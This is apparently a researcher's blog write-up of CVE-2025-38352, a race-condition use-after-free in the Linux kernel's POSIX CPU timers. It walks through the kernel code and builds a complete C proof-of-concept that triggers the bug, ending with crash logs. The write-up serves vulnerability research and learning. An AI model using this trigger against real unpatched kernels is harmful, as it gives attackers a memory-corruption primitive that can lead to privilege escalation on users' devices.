CVE-2025-38352 was a race condition use-after-free vulnerability in the Linux kernel's POSIX CPU timers implementation that was reported to have been under limited, targeted exploitation in the wild.
An analysis of this vulnerability was already posted by @streypaws. Their blog post does a good job explaining how POSIX CPU timers work, and the conditions under which this vulnerability can be triggered. You can find it here:
https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/
Since their blog post does not provide a proof of concept program that triggers the vulnerability, I decided to turn my Sunday night into a night of learning and write it myself.
This blog post provides a glimpse into how I approach analysing and writing PoCs for vulnerabilities. It also showcases how invaluable such an approach is for learning new things.
The PoC
In case you just want to see the PoC, you can find it here:
https://github.com/farazsth98/poc-CVE-2025-38352
The Patch Commit
The patch commit can be found here:
Testing Environment TL;DR
Kernel Version
I used the LTS kernel version 6.12.33, as that was the latest LTS release that was still vulnerable to this bug.
CONFIG_POSIX_CPU_TIMERS_TASK_WORK
The patch commit mentions that the vulnerability cannot be triggered if CONFIG_POSIX_CPU_TIMERS_TASK_WORK is set.
The blog post by @streypaws mentions that they were unable to toggle off the CONFIG_POSIX_CPU_TIMERS_TASK_WORK flag. This is because, by default, it is an internal flag defined in kernel/time/Kconfig (link):
config HAVE_POSIX_CPU_TIMERS_TASK_WORK
bool
config POSIX_CPU_TIMERS_TASK_WORK
bool
default y if POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK

And HAVE_POSIX_CPU_TIMERS_TASK_WORK is set for both arch/x86/Kconfig and arch/arm64/Kconfig. Therefore, this vulnerability is actually only exploitable on 32-bit Android devices, which explains why it was described as being under limited, targeted exploitation in the wild.
In order to be able to toggle it off, make the following modification to POSIX_CPU_TIMERS_TASK_WORK in kernel/time/Kconfig:
config POSIX_CPU_TIMERS_TASK_WORK
bool "CVE-2025-38352: POSIX_CPU_TIMERS_TASK_WORK toggle" if EXPERT
depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
default y
help
For CVE-2025-38352 analysis.

Now, this flag will be toggleable via make menuconfig.
For reference, I used the kernelCTF LTS config (link) as a base, and only made the above modification to be able to toggle off CONFIG_POSIX_CPU_TIMERS_TASK_WORK.
QEMU Setup
Since this is a race condition, it requires at least two CPUs to trigger. For my testing, I used a QEMU VM with 4 CPUs:
qemu-system-x86_64 \
-enable-kvm \
-cpu host \
-smp cores=4 \
# [ ... ]

Vulnerability Recap
I highly recommend reading the blog post by @streypaws (link) at this point before continuing. I will only add to the information in that blog post in order to explain how to trigger it.
Every time a per-CPU scheduler tick occurs, the kernel calls run_posix_cpu_timers() on each CPU. This function ends up calling handle_posix_cpu_timers() if a timer is ready to fire.
The vulnerability occurs specifically because handle_posix_cpu_timers() is allowed to run even if a task has become a zombie (that is, the task's tsk->exit_state is set to EXIT_ZOMBIE).
Let's take a quick look at handle_posix_cpu_timers() to understand the vulnerability:
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
struct k_itimer *timer, *next;
unsigned long flags, start;
LIST_HEAD(firing); // Faith: local list of timers
// Faith: acquire tsk->sighand->siglock
if (!lock_task_sighand(tsk, &flags))
return;
do {
// [ 1 ]
// Collect all firing timers into the `firing` list
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
// [ ... ]
} while (!posix_cpu_timers_enable_work(tsk, start));
// Faith: release tsk->sighand->siglock
unlock_task_sighand(tsk, &flags);
// Faith: RACE WINDOW START
// [ 2 ]
// Faith: Iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
// Faith: RACE WINDOW ENDS after the timer is finished being
// accessed.
}
}

Referring to my own comments in the code above, and assuming there is only one firing timer:
- After acquiring the tsk->sighand->siglock, it collects the firing timer and stores it in the local firing list. Notably, it removes the timer from the task at this point.
- After the timer is collected, tsk->sighand->siglock is dropped, and the function then iterates over the local firing list and fires the timer.
Now, if the task is a zombie task, then after the tsk->sighand->siglock is dropped, a race window opens up. Inside this race window, another process can do the following to free the timer that's in the firing list:
- Reap the zombie task - This can be done by a parent process using waitpid().
- Call the timer_delete() syscall - This will call posix_cpu_timer_del() and free the timer via RCU.
When the parent process reaps the zombie task, release_task() will be called on it, which will end up setting the tsk->sighand to NULL via __exit_signal():
static void __exit_signal(struct task_struct *tsk)
{
// [ ... ]
sighand = rcu_dereference_check(tsk->sighand,
lockdep_tasklist_lock_is_held());
spin_lock(&sighand->siglock);
// [ ... ]
tsk->sighand = NULL; // Faith: HERE
spin_unlock(&sighand->siglock);
// [ ... ]
}

Then, when timer_delete() is used to call posix_cpu_timer_del(), it will notice that tsk->sighand is NULL, and just return 0:
static int posix_cpu_timer_del(struct k_itimer *timer)
{
// [ ... ]
int ret = 0;
// [ ... ]
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
WARN_ON_ONCE(ctmr->head || timerqueue_node_queued(&ctmr->node));
} else {
// [ ... ]
}
out:
// [ ... ]
return ret;
}

When posix_cpu_timer_del() returns 0, control returns to the timer_delete() syscall handler, which calls posix_timer_unhash_and_free() and frees the timer:
SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
// [ ... ]
retry_delete:
// [ ... ]
// Faith: timer_delete_hook() calls posix_cpu_timer_del()
if (unlikely(timer_delete_hook(timer) == TIMER_RETRY)) {
/* Unlocks and relocks the timer if it still exists */
timer = timer_wait_running(timer, &flags);
goto retry_delete;
}
// [ ... ]
posix_timer_unhash_and_free(timer);
return 0;
}

The actual freeing is done via RCU, so it does not happen immediately:
static void posix_timer_unhash_and_free(struct k_itimer *tmr)
{
// [ ... ]
posix_timer_free(tmr);
}
static void posix_timer_free(struct k_itimer *tmr)
{
// [ ... ]
call_rcu(&tmr->rcu, k_itimer_rcu_free);
}

Assuming all of this occurs in the race window described above, when handle_posix_cpu_timers() iterates over the local firing list and accesses the timer, it leads to a UAF:
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
// [ ... ]
// Faith: Iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
// Faith: UAF occurs here
}
}

Planning Out The PoC
Now that we know what to do to trigger the vulnerability, let's plan out a proof of concept step-by-step.
Minimal POSIX CPU Timer PoC
The first thing we want to do is be able to call into handle_posix_cpu_timers(). The following minimal PoC achieves that:
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
void timer_fire(void) {
printf("Timer fired\n");
}
int main(void) {
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_THREAD;
sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
timer_t timer;
int ret = timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
printf("timer_create returned: %d\n", ret);
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {1, 0},
};
timer_settime(timer, 0, &ts, NULL);
printf("Timer armed\n");
// Use up CPU time to fire the timer
while (1);
}

timer_create() is used to create a POSIX CPU timer that calls timer_fire() when it fires. timer_settime() is used to make the timer fire after 1 second of CPU time has been used up by the current thread.
Creating a Zombie Task
In order to understand how to transition a task into the EXIT_ZOMBIE exit state, let's take a look at exit_notify(), which is called via do_exit() when a thread / process has finished running and is exiting:
static void exit_notify(struct task_struct *tsk, int group_dead)
{
// [ ... ]
LIST_HEAD(dead);
// [ ... ]
tsk->exit_state = EXIT_ZOMBIE; // [ 1 ]
// [ ... ]
// [ 2 ]
if (unlikely(tsk->ptrace)) {
int sig = thread_group_leader(tsk) &&
thread_group_empty(tsk) &&
!ptrace_reparented(tsk) ?
tsk->exit_signal : SIGCHLD;
autoreap = do_notify_parent(tsk, sig);
}
// [ ... ]
// [ 3 ]
if (autoreap) {
tsk->exit_state = EXIT_DEAD;
list_add(&tsk->ptrace_entry, &dead);
}
// [ ... ]
// [ 4 ]
list_for_each_entry_safe(p, n, &dead, ptrace_entry) {
list_del_init(&p->ptrace_entry);
release_task(p);
}
}

Referring to my annotations in the code above:
- The task's exit state is initially set to EXIT_ZOMBIE.
- If the task is currently being ptraced, autoreap is set to the return value of do_notify_parent(). do_notify_parent() will return false as long as the parent process is not ignoring SIGCHLD signals.
- If autoreap is true, the task's exit state is set to EXIT_DEAD instead, and it is added to the local dead list.
- The local dead list is iterated, and release_task() is called on each task on the list.
From our analysis in the previous section, we know that release_task() will set tsk->sighand to NULL.
Since we actually want handle_posix_cpu_timers() to be able to lock tsk->sighand->siglock and collect our firing timer in the local firing list, we do not want the task to be released here.
Therefore, in order to create a zombie task here, tsk->ptrace must be set, meaning that there must be a parent process ptracing this task. Additionally, the parent process must not be ignoring SIGCHLD signals.
Reaping a Zombie Task
In the context of threads and processes, "reaping" is the act of fully releasing and freeing a task (primarily the task structure allocated for it). The final reaping step is generally to get the kernel to call release_task() on the task.
A zombie task can be reaped by calling waitpid(zombie_task_pid, ...) in the parent ptracer process. The call stack we want is as follows:
do_wait()
-> __do_wait()
-> do_wait_pid()
-> wait_consider_task()
-> wait_task_zombie()
-> release_task()

There is too much code to show in this call stack, so the following are the important conditions that we must meet to successfully reap the zombie task and call release_task() on it:
- do_wait_pid() will only be called if we specify a PID (as opposed to a TGID, PGID, etc).
- wait_task_zombie() will only be called if the following conditions are met:
  - The zombie task is being ptraced.
  - The zombie task is NOT the current thread group leader (by default, the thread group leader is the main thread of a process).
To meet the conditions above, the zombie task must be a non-main thread in a process that's being ptraced by a parent process.
Additionally, the parent process must specify the zombie task's thread ID (which is just a PID) to waitpid(), which means the child process has to communicate the thread ID to the parent process somehow.
Controlled Reaping of a Zombie Task
The following proof of concept demonstrates a parent process that has full control over when it reaps a non-main thread in a child process:
#define _GNU_SOURCE
#include <stdio.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
void pin_on_cpu(int i) {
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
pthread_t reapee_thread;
pthread_barrier_t barrier;
int c2p[2]; // child to parent
int p2c[2]; // parent to child
void reapee(void) {
pin_on_cpu(2);
prctl(PR_SET_NAME, "REAPEE");
// Send this thread's TID to the parent process
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));
// Wait for the parent to attach
pthread_barrier_wait(&barrier);
return;
}
int main(int argc, char *argv[]) {
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));
pid_t pid = SYSCHK(fork());
if (pid) {
// parent
pin_on_cpu(1);
char m;
close(c2p[1]);
close(p2c[0]);
// Receive child process's REAPEE thread's TID
pid_t tid;
SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
printf("Parent: reapee thread ID: %d\n", tid);
// Attach to the REAPEE thread and continue it
printf("Parent: attaching to REAPEE thread\n");
SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
SYSCHK(waitpid(tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m, 1));
// Reap the REAPEE thread now
printf("Parent: press enter to reap REAPEE thread\n");
getchar();
SYSCHK(waitpid(tid, NULL, __WALL));
printf("Parent: detached from REAPEE\n");
sleep(5);
} else {
// child
pin_on_cpu(0);
char m;
close(c2p[0]);
close(p2c[1]);
prctl(PR_SET_NAME, "CHILD_MAIN");
pthread_barrier_init(&barrier, NULL, 2);
pthread_create(&reapee_thread, NULL, (void*)reapee, NULL);
printf("Thread created\n");
// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m, 1));
pthread_barrier_wait(&barrier);
pause();
}
}

When running this PoC, attach GDB to the kernel after observing the following output:
Thread created
Parent: reapee thread ID: 152
Parent: attaching to REAPEE thread
Parent: press enter to reap REAPEE thread

In GDB, set a breakpoint at release_task() and continue. You can press enter at any point to trigger release_task():
gef> p p->comm
$1 = "REAPEE\000\000\000\000\000\000\000\000\000"
gef> bt
#0 release_task (p=p@entry=0xffff88800892d280) at kernel/exit.c:245
#1 0xffffffff811a549f in wait_task_zombie (p=0xffff88800892d280, wo=0xffffc90000627eb0) at kernel/exit.c:1254
#2 wait_consider_task (wo=wo@entry=0xffffc90000627eb0, ptrace=<optimized out>, ptrace@entry=0x1, p=0xffff88800892d280) at kernel/exit.c:1481
#3 0xffffffff811a6cd6 in do_wait_pid (wo=0xffffc90000627eb0) at kernel/exit.c:1629
#4 __do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1655
#5 0xffffffff811a6d86 in do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1696

Note that release_task() can periodically be called to reap kworker threads. In that case, you can just ignore it and continue.
Writing the PoC
Now, let's finally write the PoC!
Kernel Patch To Extend The Race Window
In order to help trigger the bug, I added a 500ms delay inside handle_posix_cpu_timers() to extend the race window. It makes the PoC much more reliable:
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
// [ ... ]
unlock_task_sighand(tsk, &flags);
// Faith: extend the race window
if (strcmp(tsk->comm, "SLOWME") == 0) {
printk("Faith: Did we win? tsk->exit_state: %d\n", tsk->exit_state);
mdelay(500);
}
// [ ... ]
}

Note that this patch is not necessary to trigger the vulnerability. For example, you can completely fill up the local firing list and ensure that the UAF occurs on the very last timer in the list. Iterating over all the earlier timers should then provide enough time to trigger the UAF on the last one without the patch (I just took a shortcut to save time).
Triggering the race condition
In order to trigger the race condition, we have to combine our two PoCs from the previous section together, and ensure that the POSIX CPU timer is set up such that it fires after exit_notify() transitions the tsk->exit_state to EXIT_ZOMBIE.
Effectively, this means that when the non-main thread in the child process exits, there must be just enough CPU time left for the kernel's do_exit() function to call exit_notify() and transition the task to a zombie task before the timer fires.
However, we cannot have too much CPU time left either! Otherwise, do_exit() will finish executing before all the remaining CPU time is used up, and the timer will never fire, since the thread stops consuming CPU time at that point.
Through some trial and error, in my local environment, a value of 250,000 nanoseconds worth of CPU time ended up working well.
Now, let's walk through the important parts of the final PoC step-by-step (full PoC is shown at the end).
Custom Wait Time Implementation
First, I specified a custom wait_time via argv[1] for easier testing. This is the CPU time that must be used up before the timer fires:
long int wait_time = 250000; // Works for me
int main(int argc, char *argv[]) {
// Use a custom wait time to figure out the exact timing when the
// timer will fire right after `exit_notify()` sets the task's
// state to EXIT_ZOMBIE.
if (argc > 1) {
wait_time = strtol(argv[1], NULL, 10);
printf("Custom wait time: %ld\n", wait_time);
}

Setting Up The Timer
Now, in the reapee thread, create a POSIX CPU timer and set it to fire after the custom wait_time.
Also ensure that the thread's name is set to SLOWME so that it is affected by the custom mdelay() patch we added to handle_posix_cpu_timers():
void reapee(void) {
pin_on_cpu(2);
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_THREAD;
sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
char m;
prctl(PR_SET_NAME, "SLOWME");
// Send this thread's TID to the parent process
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));
printf("Creating timer\n");
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
printf("Timer created\n");
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {0, wait_time}, // Custom wait time
};
// Wait for parent to attach
pthread_barrier_wait(&barrier);
SYSCHK(timer_settime(timer, 0, &ts, NULL));
// Use some CPU time to make sure the timer will fire correctly
for (int i = 0; i < 1000000; i++);
return;
}

Reaping The Timer Thread And Deleting The Timer
Finally, inside the parent and child processes, we must do the following:
- Parent process - Reap the REAPEE thread the same as before, and wait for the child to free the timer.
- Child process - Wait for the parent process to reap the REAPEE thread, then use timer_delete() to delete the timer.
int main(int argc, char *argv[]) {
// [ ... ]
pid_t pid = SYSCHK(fork());
if (pid) {
// parent
// [ ... ]
// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m, 1));
// Reap the REAPEE thread now
printf("Parent: reaping REAPEE thread\n");
SYSCHK(waitpid(tid, NULL, __WALL));
printf("Parent: detached from REAPEE\n");
// Let the child process know REAPEE is reaped
SYSCHK(write(p2c[1], &m, 1));
// Let the child process delete and free the timer
// before exiting
SYSCHK(read(c2p[0], &m, 1));
} else {
// child
// [ ... ]
// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m, 1));
pthread_barrier_wait(&barrier);
// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
// `timer_delete()` should make it see a NULL `sighand`, which will cause it to
// just free the timer unconditionally.
SYSCHK(read(p2c[0], &m, 1));
timer_delete(timer);
printf("Child: timer deleted\n");
// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();
SYSCHK(write(c2p[1], &m, 1));
pause();
}
}

Testing The PoC
And that's it! The steps to run this PoC are as follows:
- Compile using gcc -o poc -static poc.c
- Run using while true; do /poc; done in the VM.
Note that the PoC does not hit the race condition 100% of the time, which is why I repeat it until it hits with the bash while loop.
You should modify the default wait_time to a value that works in your testing environment first.
Now, let's look at what the KASAN and non-KASAN splats look like 👀
KASAN Splat
With KASAN enabled, a UAF write can be observed:
[ 9.995817] ==================================================================
[ 9.999410] BUG: KASAN: slab-use-after-free in posix_timer_queue_signal+0x16a/0x1a0
[ 10.003168] Write of size 4 at addr ffff88800e628188 by task SLOWME/179
[ 10.006386]
[ 10.007400] CPU: 2 UID: 0 PID: 179 Comm: SLOWME Not tainted 6.12.33 #7
[ 10.007406] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 10.007408] Call Trace:
[ 10.007455] <IRQ>
[ 10.007468] dump_stack_lvl+0x66/0x80
[ 10.007487] print_report+0xc1/0x610
[ 10.007503] ? posix_timer_queue_signal+0x16a/0x1a0
[ 10.007506] kasan_report+0xaf/0xe0
[ 10.007509] ? posix_timer_queue_signal+0x16a/0x1a0
[ 10.007512] posix_timer_queue_signal+0x16a/0x1a0
[ 10.007515] cpu_timer_fire+0x8d/0x190
[ 10.007518] run_posix_cpu_timers+0x807/0x1840

Non-KASAN Splat
With KASAN disabled, a WARN_ON_ONCE inside send_sigqueue() can be observed:
[ 29.647984] ------------[ cut here ]------------
[ 29.650267] WARNING: CPU: 2 PID: 205 at kernel/signal.c:1974 send_sigqueue+0x1be/0x250
[ 29.653905] Modules linked in:
[ 29.655484] CPU: 2 UID: 0 PID: 205 Comm: SLOWME Not tainted 6.12.33 #5
[ 29.658569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 29.662579] RIP: 0010:send_sigqueue+0x1be/0x250
[ 29.664712] Code: 44 89 e0 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d5 e9 94 01 41 bc ff ff ff ff eb e2 48 8b 85 b0 07 00 00 48 8d 50 40 e9 2a ff ff ff <0f> 0b 45 31 e4 eb cb 0f 0b eb c7 4c 89 fe e8 bf 47 6a 01 48 8b bd
// [ ... ] Register states snipped out
[ 29.703210] Call Trace:
[ 29.704498] <IRQ>
[ 29.705663] posix_timer_queue_signal+0x3f/0x50
[ 29.707869] cpu_timer_fire+0x23/0x70
[ 29.709572] run_posix_cpu_timers+0x2bc/0x5e0

Quick Note on CONFIG_POSIX_CPU_TIMERS_TASK_WORK
The blog post by @streypaws (link) mentions being able to hit this vulnerability even with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled. However, I was not able to observe the same results.
In fact, after looking at what exit_task_work() does in do_exit(), it makes sense why the vulnerability cannot be triggered with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled:
- exit_task_work() calls task_work_run().
- task_work_run() "poisons" the task->task_works structure, preventing any further work from being queued on it.
Since the vulnerability specifically requires exit_notify() to be called before handle_posix_cpu_timers(), and exit_task_work() (which calls handle_posix_cpu_timers() if it's enqueued) is called before exit_notify(), it is not possible to trigger this vulnerability with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled.
Exploitation
I'm not sure if I will spend time writing an exploit for this vulnerability, but I did note the following:
- POSIX CPU timers are allocated out of their own kmem_cache.
- The struct k_itimer structure is not really that complex, so cross-cache is likely necessary.
- For cross-cache, the race window inside handle_posix_cpu_timers() likely needs to be extended.
- Extending the race window may be tricky given that handle_posix_cpu_timers() runs in the scheduler tick interrupt context, where IRQs are disabled.
My PoC already provides a UAF primitive, and if we go by what the Android bulletin mentions, this vulnerability is definitely exploitable. It's just a matter of solving the exploit engineering problems above.
If I end up spending time on exploiting this vulnerability, I will update this blog post with the details 😄
Conclusion
As I've mentioned in a previous blog post, my opinion is that analyzing and writing PoCs for complicated vulnerabilities is the best way to learn and conduct vulnerability research.
In this case, not only did I learn about POSIX CPU timers, but I learned how timers work in general, as well as how processes and threads are described via task structures in the Linux kernel.
If you have any questions, please let me know via Twitter or wherever else!
Final PoC
The final PoC is uploaded on my GitHub. You can view it here:
https://github.com/farazsth98/poc-CVE-2025-38352
It is also shown below:
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
void pin_on_cpu(int i) {
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
void timer_fire(void) {
prctl(PR_SET_NAME, "TIMER_FIRED");
printf("Timer fired\n");
}
void wait_for_rcu() {
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}
pthread_barrier_t barrier;
timer_t timer;
pthread_t reapee_thread;
int c2p[2]; // child to parent
int p2c[2]; // parent to child
long int wait_time = 250000;
void reapee(void) {
pin_on_cpu(2);
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_THREAD;
sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
char m;
prctl(PR_SET_NAME, "SLOWME");
// Send this thread's TID to the parent process
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));
printf("Creating timer\n");
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
printf("Timer created\n");
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {
.tv_sec = 0,
.tv_nsec = wait_time, // Custom wait time
},
};
// Wait for parent to attach
pthread_barrier_wait(&barrier);
SYSCHK(timer_settime(timer, 0, &ts, NULL));
// Use some CPU time to make sure the timer will fire correctly
for (int i = 0; i < 1000000; i++);
return;
}
int main(int argc, char *argv[]) {
// Use a custom wait time to figure out the exact timing when the
// timer will fire right after `exit_notify()` sets the task's
// state to EXIT_ZOMBIE.
if (argc > 1) {
wait_time = strtol(argv[1], NULL, 10);
printf("Custom wait time: %ld\n", wait_time);
}
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));
pid_t pid = SYSCHK(fork());
if (pid) {
// parent
pin_on_cpu(1);
char m;
close(c2p[1]);
close(p2c[0]);
// Receive child process's REAPEE thread's TID
pid_t tid;
SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
printf("Parent: reapee thread ID: %d\n", tid);
// Attach and continue
printf("Parent: attaching to REAPEE thread\n");
SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
SYSCHK(waitpid(tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m, 1));
// Reap the REAPEE thread now
printf("Parent: reaping REAPEE thread\n");
SYSCHK(waitpid(tid, NULL, __WALL));
printf("Parent: detached from REAPEE\n");
// Let the child process know REAPEE is reaped
SYSCHK(write(p2c[1], &m, 1));
// Let the child process delete and free the timer
// before exiting
SYSCHK(read(c2p[0], &m, 1));
} else {
// child
pin_on_cpu(0);
char m;
close(c2p[0]);
close(p2c[1]);
prctl(PR_SET_NAME, "CHILD_MAIN");
pthread_barrier_init(&barrier, NULL, 2);
pthread_create(&reapee_thread, NULL, (void*)reapee, NULL);
printf("Thread created\n");
// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m, 1));
pthread_barrier_wait(&barrier);
// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
// `timer_delete()` should make it see a NULL `sighand`, which will cause it to
// just free the timer unconditionally.
SYSCHK(read(p2c[0], &m, 1));
timer_delete(timer);
printf("Child: timer deleted\n");
// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();
SYSCHK(write(c2p[1], &m, 1));
pause();
}
}